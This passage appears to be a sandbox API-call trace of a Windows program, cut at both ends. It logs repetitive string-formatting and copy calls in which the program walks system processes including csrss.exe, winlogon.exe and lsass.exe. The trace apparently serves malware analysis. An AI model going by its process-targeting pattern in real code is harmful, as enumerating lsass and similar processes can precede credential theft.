returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="1024") returned 4 [0158.396] lstrcpynA (in: lpString1=0x33fdd8, lpString2="csrss.exe", iMaxLength=1024 | out: lpString1="csrss.exe") returned="csrss.exe" [0158.396] lstrcpyA (in: lpString1=0x431400, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="-1") returned 2 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3304192") returned 7 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="10") returned 2 [0158.396] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.396] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.396] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.396] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.398] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304216") returned 7 [0158.398] lstrcpyA (in: lpString1=0x33e508, lpString2="3304216" | out: lpString1="3304216") returned="3304216" [0158.398] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.398] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="380") returned 3 [0158.398] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3304592") returned 7 [0158.399] lstrcpyA (in: lpString1=0x430800, lpString2="3304592" | out: lpString1="3304592") returned="3304592" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="400") returned 3 [0158.399] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3304216") returned 7 [0158.399] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.399] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.399] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.399] lstrcpynA (in: lpString1=0x341200, lpString2="wininit.exe", iMaxLength=1024 | out: lpString1="wininit.exe") returned="wininit.exe" [0158.399] lstrcpyA (in: lpString1=0x431400, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="-1") returned 2 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3304592") returned 7 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="12") returned 2 [0158.399] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.399] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.401] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.401] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.401] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304616") returned 7 [0158.401] lstrcpyA (in: lpString1=0x33e508, lpString2="3304616" | out: lpString1="3304616") returned="3304616" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="392") returned 3 [0158.401] lstrcpyA (in: lpString1=0x431800, lpString2="392" | out: lpString1="392") returned="392" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3305376") returned 7 [0158.401] lstrcpyA (in: lpString1=0x430800, lpString2="3305376" | out: lpString1="3305376") returned="3305376" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="784") returned 3 [0158.401] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3304616") returned 7 [0158.401] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.401] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.401] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="1024") returned 4 [0158.402] lstrcpynA (in: lpString1=0x3409f0, lpString2="csrss.exe", iMaxLength=1024 | out: lpString1="csrss.exe") returned="csrss.exe" [0158.402] lstrcpyA (in: lpString1=0x431400, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="-1") returned 2 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3305376") returned 7 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="10") returned 2 [0158.402] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.402] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.403] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3305400") returned 7 [0158.404] lstrcpyA (in: lpString1=0x33e508, lpString2="3305400" | out: lpString1="3305400") returned="3305400" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="432") returned 3 [0158.404] lstrcpyA (in: lpString1=0x431800, lpString2="432" | out: lpString1="432") returned="432" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3305840") returned 7 [0158.404] lstrcpyA (in: lpString1=0x430800, lpString2="3305840" | out: lpString1="3305840") returned="3305840" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="472") returned 3 [0158.404] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3305400") returned 7 [0158.404] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.404] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.404] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="1024") returned 4 [0158.404] lstrcpynA (in: lpString1=0x33f5c8, lpString2="winlogon.exe", iMaxLength=1024 | out: lpString1="winlogon.exe") returned="winlogon.exe" [0158.404] lstrcpyA (in: lpString1=0x431400, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="-1") returned 2 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3305840") returned 7 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="13") returned 2 [0158.404] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.404] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.404] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3305872") returned 7 [0158.406] lstrcpyA (in: lpString1=0x33e508, lpString2="3305872" | out: lpString1="3305872") returned="3305872" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="476") returned 3 [0158.406] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3306760") returned 7 [0158.406] lstrcpyA (in: lpString1=0x430800, lpString2="3306760" | out: lpString1="3306760") returned="3306760" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="920") returned 3 [0158.406] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3305872") returned 7 [0158.407] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.407] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.407] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.407] lstrcpynA (in: lpString1=0x340df8, lpString2="services.exe", iMaxLength=1024 | out: lpString1="services.exe") returned="services.exe" [0158.407] lstrcpyA (in: lpString1=0x431400, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3306760") returned 7 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="13") returned 2 [0158.407] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.407] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] lstrcpyA (in: lpString1=0x33e508, lpString2="3306792" | out: lpString1="3306792") returned="3306792" [0158.408] lstrcpyA (in: lpString1=0x431800, lpString2="484" | out: lpString1="484") returned="484" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3307424") returned 7 [0158.408] lstrcpyA (in: lpString1=0x430800, lpString2="3307424" | out: lpString1="3307424") returned="3307424" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="656") returned 3 [0158.408] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3306792") returned 7 [0158.409] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.409] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.409] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.409] lstrcpyA (in: lpString1=0x431400, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="-1") returned 2 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3307424") returned 7 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="10") returned 2 [0158.409] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.409] lstrcpyA (in: lpString1=0x33e508, lpString2="3307448" | out: lpString1="3307448") returned="3307448" [0158.409] lstrcpyA (in: lpString1=0x431800, lpString2="492" | out: lpString1="492") returned="492" [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3308272") returned 7 [0158.409] lstrcpyA (in: lpString1=0x430800, lpString2="3308272" | out: lpString1="3308272") returned="3308272" [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: 